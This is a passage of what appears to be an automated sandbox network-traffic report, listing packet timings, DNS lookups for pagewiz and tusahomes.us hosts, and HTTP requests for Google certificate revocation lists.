                                                                Apr 9, 2025 02:19:48.887927055 CEST49785443192.168.2.5137.184.178.231
                                                                Apr 9, 2025 02:19:49.171278954 CEST44349735137.184.178.231192.168.2.5
                                                                Apr 9, 2025 02:19:49.171370029 CEST44349735137.184.178.231192.168.2.5
                                                                Apr 9, 2025 02:19:49.171462059 CEST49735443192.168.2.5137.184.178.231
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 9, 2025 02:18:25.046725988 CEST53506241.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:25.060497999 CEST53544191.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:26.031486034 CEST53565211.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:29.036283970 CEST5398253192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:29.036462069 CEST5988353192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:29.137558937 CEST53598831.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:30.051117897 CEST5007753192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:30.152925014 CEST53500771.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:30.512437105 CEST5160053192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:30.526207924 CEST5613153192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:30.527190924 CEST6378953192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:30.528920889 CEST6204753192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:30.616729021 CEST53516001.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:30.630311012 CEST53637891.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:30.631481886 CEST53561311.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:30.652776957 CEST53620471.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:33.672440052 CEST5753753192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:33.672619104 CEST4924153192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:33.675878048 CEST5352953192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:33.676161051 CEST5725953192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:33.769342899 CEST53536351.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:33.771694899 CEST53497501.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:33.777585030 CEST53575371.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:33.778388023 CEST53535291.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:33.785438061 CEST53572591.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:33.832056999 CEST53492411.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:34.505848885 CEST5448953192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:34.505985022 CEST4918553192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:34.615842104 CEST53491851.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:34.644272089 CEST53544891.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:35.336050034 CEST5556753192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:35.336289883 CEST6427253192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:35.336652040 CEST5947253192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:35.336796045 CEST6011453192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:35.437846899 CEST53642721.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:35.437979937 CEST53555671.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:35.438282967 CEST53594721.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:35.443460941 CEST53601141.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:35.893812895 CEST5742353192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:35.894004107 CEST6127953192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:35.997622967 CEST53574231.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:35.998308897 CEST53612791.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:36.047975063 CEST6406553192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:36.048286915 CEST6306653192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:36.139226913 CEST5560253192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:36.139600992 CEST6464953192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:36.149979115 CEST53640651.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:36.154490948 CEST53630661.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:36.239320993 CEST53556021.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:36.242810011 CEST53646491.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:43.057621002 CEST53559221.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:45.699928045 CEST5318253192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:45.700432062 CEST6375953192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:45.805382967 CEST53637591.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:45.805402994 CEST53531821.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:45.974522114 CEST5948853192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:45.974684954 CEST5698053192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:46.080780983 CEST53594881.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:46.080952883 CEST53569801.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:49.695301056 CEST5700953192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:49.695446014 CEST6280653192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:49.801532984 CEST53628061.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:49.802531958 CEST53570091.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:52.829003096 CEST6329353192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:52.829132080 CEST5623653192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:52.936733007 CEST53632931.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:52.953969955 CEST53562361.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:58.323502064 CEST6416253192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:58.323625088 CEST5137453192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:18:58.431368113 CEST53641621.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:18:58.448779106 CEST53513741.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:02.213428974 CEST53510341.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:04.967876911 CEST5067153192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:19:04.968736887 CEST6542753192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:19:05.072859049 CEST53654271.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:05.073586941 CEST53506711.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:05.126823902 CEST6514153192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:19:05.126967907 CEST5180653192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:19:05.235054970 CEST53651411.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:05.316063881 CEST53518061.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:15.186913967 CEST6149853192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:19:15.187067032 CEST6214453192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:19:15.291615963 CEST53614981.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:15.293008089 CEST53621441.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:22.828684092 CEST53644271.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:22.984349966 CEST138138192.168.2.5192.168.2.255
                                                                Apr 9, 2025 02:19:24.388853073 CEST5547253192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:19:24.389245033 CEST5980753192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:19:24.494231939 CEST53598071.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:24.529114008 CEST53554721.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:24.794127941 CEST53562211.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:25.040710926 CEST53607101.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:27.414573908 CEST53529911.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:30.431706905 CEST6467353192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:19:30.431828022 CEST6118353192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:19:30.538723946 CEST53611831.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:30.539383888 CEST53646731.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:45.989104986 CEST5139753192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:19:45.989326000 CEST5419253192.168.2.51.1.1.1
                                                                Apr 9, 2025 02:19:46.094844103 CEST53513971.1.1.1192.168.2.5
                                                                Apr 9, 2025 02:19:46.096369982 CEST53541921.1.1.1192.168.2.5
                                                                TimestampSource IPDest IPChecksumCodeType
                                                                Apr 9, 2025 02:18:33.832160950 CEST192.168.2.51.1.1.1c246(Port unreachable)Destination Unreachable
                                                                Apr 9, 2025 02:19:05.316163063 CEST192.168.2.51.1.1.1c24d(Port unreachable)Destination Unreachable
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Apr 9, 2025 02:18:29.036283970 CEST192.168.2.51.1.1.10xb590Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:29.036462069 CEST192.168.2.51.1.1.10x5f7eStandard query (0)www.google.com65IN (0x0001)false
                                                                Apr 9, 2025 02:18:30.051117897 CEST192.168.2.51.1.1.10xfef7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:30.512437105 CEST192.168.2.51.1.1.10x8b9cStandard query (0)p1.pagewiz.netA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:30.526207924 CEST192.168.2.51.1.1.10x265eStandard query (0)p1.pagewiz.net65IN (0x0001)false
                                                                Apr 9, 2025 02:18:30.527190924 CEST192.168.2.51.1.1.10xfe93Standard query (0)p1.pagewiz.netA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:30.528920889 CEST192.168.2.51.1.1.10xa94cStandard query (0)p1.pagewiz.net65IN (0x0001)false
                                                                Apr 9, 2025 02:18:33.672440052 CEST192.168.2.51.1.1.10x37d6Standard query (0)static.pagewizcdn.comA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:33.672619104 CEST192.168.2.51.1.1.10x8307Standard query (0)static.pagewizcdn.com65IN (0x0001)false
                                                                Apr 9, 2025 02:18:33.675878048 CEST192.168.2.51.1.1.10x2952Standard query (0)m1.pagewizcdn.comA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:33.676161051 CEST192.168.2.51.1.1.10x7bc2Standard query (0)m1.pagewizcdn.com65IN (0x0001)false
                                                                Apr 9, 2025 02:18:34.505848885 CEST192.168.2.51.1.1.10x9571Standard query (0)m1.pagewizcdn.comA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:34.505985022 CEST192.168.2.51.1.1.10x517fStandard query (0)m1.pagewizcdn.com65IN (0x0001)false
                                                                Apr 9, 2025 02:18:35.336050034 CEST192.168.2.51.1.1.10xcc1eStandard query (0)stats.pagewiz.comA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:35.336289883 CEST192.168.2.51.1.1.10x5c0bStandard query (0)stats.pagewiz.com65IN (0x0001)false
                                                                Apr 9, 2025 02:18:35.336652040 CEST192.168.2.51.1.1.10x88cbStandard query (0)statdumper.pagewiz.comA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:35.336796045 CEST192.168.2.51.1.1.10x5a65Standard query (0)statdumper.pagewiz.com65IN (0x0001)false
                                                                Apr 9, 2025 02:18:35.893812895 CEST192.168.2.51.1.1.10x6991Standard query (0)statdumper.pagewiz.comA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:35.894004107 CEST192.168.2.51.1.1.10xb5b7Standard query (0)statdumper.pagewiz.com65IN (0x0001)false
                                                                Apr 9, 2025 02:18:36.047975063 CEST192.168.2.51.1.1.10x7fddStandard query (0)stats.pagewiz.comA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:36.048286915 CEST192.168.2.51.1.1.10xeb20Standard query (0)stats.pagewiz.com65IN (0x0001)false
                                                                Apr 9, 2025 02:18:36.139226913 CEST192.168.2.51.1.1.10xe142Standard query (0)p1.pagewiz.netA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:36.139600992 CEST192.168.2.51.1.1.10x8f14Standard query (0)p1.pagewiz.net65IN (0x0001)false
                                                                Apr 9, 2025 02:18:45.699928045 CEST192.168.2.51.1.1.10x654Standard query (0)vericast.tusahomes.usA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:45.700432062 CEST192.168.2.51.1.1.10xeffdStandard query (0)vericast.tusahomes.us65IN (0x0001)false
                                                                Apr 9, 2025 02:18:45.974522114 CEST192.168.2.51.1.1.10x531dStandard query (0)vericast.tusahomes.usA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:45.974684954 CEST192.168.2.51.1.1.10xf215Standard query (0)vericast.tusahomes.us65IN (0x0001)false
                                                                Apr 9, 2025 02:18:49.695301056 CEST192.168.2.51.1.1.10x5e13Standard query (0)330c68f2903044fdaf0390e944b7092d.tusahomes.usA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:49.695446014 CEST192.168.2.51.1.1.10x600bStandard query (0)330c68f2903044fdaf0390e944b7092d.tusahomes.us65IN (0x0001)false
                                                                Apr 9, 2025 02:18:52.829003096 CEST192.168.2.51.1.1.10xa84aStandard query (0)c547f1062152409fa58dda457a02be72.tusahomes.usA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:52.829132080 CEST192.168.2.51.1.1.10x61fcStandard query (0)c547f1062152409fa58dda457a02be72.tusahomes.us65IN (0x0001)false
                                                                Apr 9, 2025 02:18:58.323502064 CEST192.168.2.51.1.1.10xd220Standard query (0)126d7c624ad3410bb741b30b9bf3d28f.tusahomes.usA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:58.323625088 CEST192.168.2.51.1.1.10xdd28Standard query (0)126d7c624ad3410bb741b30b9bf3d28f.tusahomes.us65IN (0x0001)false
                                                                Apr 9, 2025 02:19:04.967876911 CEST192.168.2.51.1.1.10xe19bStandard query (0)69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:19:04.968736887 CEST192.168.2.51.1.1.10x4503Standard query (0)69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us65IN (0x0001)false
                                                                Apr 9, 2025 02:19:05.126823902 CEST192.168.2.51.1.1.10xd1d2Standard query (0)8f0da58963954c5ebda6645ba9a83b28.tusahomes.usA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:19:05.126967907 CEST192.168.2.51.1.1.10x2810Standard query (0)8f0da58963954c5ebda6645ba9a83b28.tusahomes.us65IN (0x0001)false
                                                                Apr 9, 2025 02:19:15.186913967 CEST192.168.2.51.1.1.10xba2dStandard query (0)69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:19:15.187067032 CEST192.168.2.51.1.1.10xbe0Standard query (0)69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us65IN (0x0001)false
                                                                Apr 9, 2025 02:19:24.388853073 CEST192.168.2.51.1.1.10xff63Standard query (0)ab52444af96f49b7b110b6e3700ca950.tusahomes.usA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:19:24.389245033 CEST192.168.2.51.1.1.10x402bStandard query (0)ab52444af96f49b7b110b6e3700ca950.tusahomes.us65IN (0x0001)false
                                                                Apr 9, 2025 02:19:30.431706905 CEST192.168.2.51.1.1.10x3248Standard query (0)ab52444af96f49b7b110b6e3700ca950.tusahomes.usA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:19:30.431828022 CEST192.168.2.51.1.1.10xc8d4Standard query (0)ab52444af96f49b7b110b6e3700ca950.tusahomes.us65IN (0x0001)false
                                                                Apr 9, 2025 02:19:45.989104986 CEST192.168.2.51.1.1.10xf28eStandard query (0)a4eaec44075f43d19af55316af4b7550.tusahomes.usA (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:19:45.989326000 CEST192.168.2.51.1.1.10x24cStandard query (0)a4eaec44075f43d19af55316af4b7550.tusahomes.us65IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Apr 9, 2025 02:18:29.137558937 CEST1.1.1.1192.168.2.50x5f7eNo error (0)www.google.com65IN (0x0001)false
                                                                Apr 9, 2025 02:18:30.152925014 CEST1.1.1.1192.168.2.50xfef7No error (0)www.google.com142.251.40.132A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:30.616729021 CEST1.1.1.1192.168.2.50x8b9cNo error (0)p1.pagewiz.net13.90.63.16A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:30.630311012 CEST1.1.1.1192.168.2.50xfe93No error (0)p1.pagewiz.net13.90.63.16A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:33.777585030 CEST1.1.1.1192.168.2.50x37d6No error (0)static.pagewizcdn.com1497675516.rsc.cdn77.orgCNAME (Canonical name)IN (0x0001)false
                                                                Apr 9, 2025 02:18:33.777585030 CEST1.1.1.1192.168.2.50x37d6No error (0)1497675516.rsc.cdn77.org79.127.206.235A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:33.777585030 CEST1.1.1.1192.168.2.50x37d6No error (0)1497675516.rsc.cdn77.org79.127.206.208A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:33.778388023 CEST1.1.1.1192.168.2.50x2952No error (0)m1.pagewizcdn.com1885148700.rsc.cdn77.orgCNAME (Canonical name)IN (0x0001)false
                                                                Apr 9, 2025 02:18:33.778388023 CEST1.1.1.1192.168.2.50x2952No error (0)1885148700.rsc.cdn77.org79.127.206.207A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:33.778388023 CEST1.1.1.1192.168.2.50x2952No error (0)1885148700.rsc.cdn77.org79.127.206.234A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:33.785438061 CEST1.1.1.1192.168.2.50x7bc2No error (0)m1.pagewizcdn.com1885148700.rsc.cdn77.orgCNAME (Canonical name)IN (0x0001)false
                                                                Apr 9, 2025 02:18:33.832056999 CEST1.1.1.1192.168.2.50x8307No error (0)static.pagewizcdn.com1497675516.rsc.cdn77.orgCNAME (Canonical name)IN (0x0001)false
                                                                Apr 9, 2025 02:18:34.615842104 CEST1.1.1.1192.168.2.50x517fNo error (0)m1.pagewizcdn.com1885148700.rsc.cdn77.orgCNAME (Canonical name)IN (0x0001)false
                                                                Apr 9, 2025 02:18:34.644272089 CEST1.1.1.1192.168.2.50x9571No error (0)m1.pagewizcdn.com1885148700.rsc.cdn77.orgCNAME (Canonical name)IN (0x0001)false
                                                                Apr 9, 2025 02:18:34.644272089 CEST1.1.1.1192.168.2.50x9571No error (0)1885148700.rsc.cdn77.org79.127.206.234A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:34.644272089 CEST1.1.1.1192.168.2.50x9571No error (0)1885148700.rsc.cdn77.org79.127.206.207A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:35.437979937 CEST1.1.1.1192.168.2.50xcc1eNo error (0)stats.pagewiz.com52.168.137.144A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:35.438282967 CEST1.1.1.1192.168.2.50x88cbNo error (0)statdumper.pagewiz.com52.168.137.144A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:35.997622967 CEST1.1.1.1192.168.2.50x6991No error (0)statdumper.pagewiz.com52.168.137.144A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:36.149979115 CEST1.1.1.1192.168.2.50x7fddNo error (0)stats.pagewiz.com52.168.137.144A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:36.239320993 CEST1.1.1.1192.168.2.50xe142No error (0)p1.pagewiz.net13.90.63.16A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:45.805402994 CEST1.1.1.1192.168.2.50x654No error (0)vericast.tusahomes.us137.184.178.231A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:46.080780983 CEST1.1.1.1192.168.2.50x531dNo error (0)vericast.tusahomes.us137.184.178.231A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:49.802531958 CEST1.1.1.1192.168.2.50x5e13No error (0)330c68f2903044fdaf0390e944b7092d.tusahomes.us137.184.178.231A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:52.936733007 CEST1.1.1.1192.168.2.50xa84aNo error (0)c547f1062152409fa58dda457a02be72.tusahomes.us137.184.178.231A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:18:58.431368113 CEST1.1.1.1192.168.2.50xd220No error (0)126d7c624ad3410bb741b30b9bf3d28f.tusahomes.us137.184.178.231A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:19:05.073586941 CEST1.1.1.1192.168.2.50xe19bNo error (0)69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us137.184.178.231A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:19:05.235054970 CEST1.1.1.1192.168.2.50xd1d2No error (0)8f0da58963954c5ebda6645ba9a83b28.tusahomes.us137.184.178.231A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:19:15.291615963 CEST1.1.1.1192.168.2.50xba2dNo error (0)69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us137.184.178.231A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:19:24.529114008 CEST1.1.1.1192.168.2.50xff63No error (0)ab52444af96f49b7b110b6e3700ca950.tusahomes.us137.184.178.231A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:19:30.539383888 CEST1.1.1.1192.168.2.50x3248No error (0)ab52444af96f49b7b110b6e3700ca950.tusahomes.us137.184.178.231A (IP address)IN (0x0001)false
                                                                Apr 9, 2025 02:19:46.094844103 CEST1.1.1.1192.168.2.50xf28eNo error (0)a4eaec44075f43d19af55316af4b7550.tusahomes.us137.184.178.231A (IP address)IN (0x0001)false
                                                                • p1.pagewiz.net
                                                                  • m1.pagewizcdn.com
                                                                  • static.pagewizcdn.com
                                                                  • statdumper.pagewiz.com
                                                                  • stats.pagewiz.com
                                                                  • vericast.tusahomes.us
                                                                    • 330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                      • 126d7c624ad3410bb741b30b9bf3d28f.tusahomes.us
                                                                      • 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                      • 8f0da58963954c5ebda6645ba9a83b28.tusahomes.us
                                                                      • ab52444af96f49b7b110b6e3700ca950.tusahomes.us
                                                                    • c547f1062152409fa58dda457a02be72.tusahomes.us
                                                                • a4eaec44075f43d19af55316af4b7550.tusahomes.us
                                                                • c.pki.goog
                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                0192.168.2.549695142.251.40.16380
                                                                TimestampBytes transferredDirectionData
                                                                Apr 9, 2025 02:18:25.177478075 CEST202OUTGET /r/gsr1.crl HTTP/1.1
                                                                Cache-Control: max-age = 3000
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                                                User-Agent: Microsoft-CryptoAPI/10.0
                                                                Host: c.pki.goog
                                                                Apr 9, 2025 02:18:25.271027088 CEST1254INHTTP/1.1 200 OK
                                                                Accept-Ranges: bytes
                                                                Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                Content-Length: 1739
                                                                X-Content-Type-Options: nosniff
                                                                Server: sffe
                                                                X-XSS-Protection: 0
                                                                Date: Tue, 08 Apr 2025 23:36:39 GMT
                                                                Expires: Wed, 09 Apr 2025 00:26:39 GMT
                                                                Cache-Control: public, max-age=3000
                                                                Age: 2506
                                                                Last-Modified: Mon, 07 Apr 2025 13:58:00 GMT
                                                                Content-Type: application/pkix-crl
                                                                Vary: Accept-Encoding
                                                                Data Raw: 30 82 06 c7 30 82 05 af 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 57 31 0b 30 09 06 03 55 04 06 13 02 42 45 31 19 30 17 06 03 55 04 0a 13 10 47 6c 6f 62 61 6c 53 69 67 6e 20 6e 76 2d 73 61 31 10 30 0e 06 03 55 04 0b 13 07 52 6f 6f 74 20 43 41 31 1b 30 19 06 03 55 04 03 13 12 47 6c 6f 62 61 6c 53 69 67 6e 20 52 6f 6f 74 20 43 41 17 0d 32 35 30 34 30 37 30 30 30 30 30 30 5a 17 0d 32 35 30 37 31 35 30 30 30 30 30 30 5a 30 82 04 f1 30 2a 02 0b 04 00 00 00 00 01 1e 44 a5 e4 04 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 29 45 c3 a8 0f 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 20 19 c1 8d 68 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 2c 5e 7f 1a 88 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 15 4b 5a [TRUNCATED]
                                                                Data Ascii: 000*H0W10UBE10UGlobalSign nv-sa10URoot CA10UGlobalSign Root CA250407000000Z250715000000Z00*D141125000000Z00U0*)E141125000000Z00U0* h141125000000Z00U0*,^141125000000Z00U0*KZ160107000000Z00U0*/NIR170419000000Z00U0*/NG170419000000Z00U0*/N9191120000000Z00U0*/N=k191204000000Z00U
                                                                Apr 9, 2025 02:18:25.271042109 CEST1199INData Raw: 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 2f 4e e1 3b 58 17 0d 31 39 31 32 30 34 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2d 02 0e 47 c3 0f ff 8a 61 9a 37 f5 a8 2e f0 b5 75 17 0d 32 30 30 36 33 30 30 30 30 30 30 30 5a
                                                                Data Ascii: 0*/N;X191204000000Z00U0-Ga7.u200630000000Z00U0-GA>ThA200630000000Z00U0-GK&TA+200630000000Z00U0*6::200711160000Z00U0/vSBS
                                                                Apr 9, 2025 02:18:25.277756929 CEST200OUTGET /r/r4.crl HTTP/1.1
                                                                Cache-Control: max-age = 3000
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                                User-Agent: Microsoft-CryptoAPI/10.0
                                                                Host: c.pki.goog
                                                                Apr 9, 2025 02:18:25.374850988 CEST1242INHTTP/1.1 200 OK
                                                                Accept-Ranges: bytes
                                                                Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                Content-Length: 530
                                                                X-Content-Type-Options: nosniff
                                                                Server: sffe
                                                                X-XSS-Protection: 0
                                                                Date: Wed, 09 Apr 2025 00:08:38 GMT
                                                                Expires: Wed, 09 Apr 2025 00:58:38 GMT
                                                                Cache-Control: public, max-age=3000
                                                                Age: 587
                                                                Last-Modified: Thu, 03 Apr 2025 14:18:00 GMT
                                                                Content-Type: application/pkix-crl
                                                                Vary: Accept-Encoding
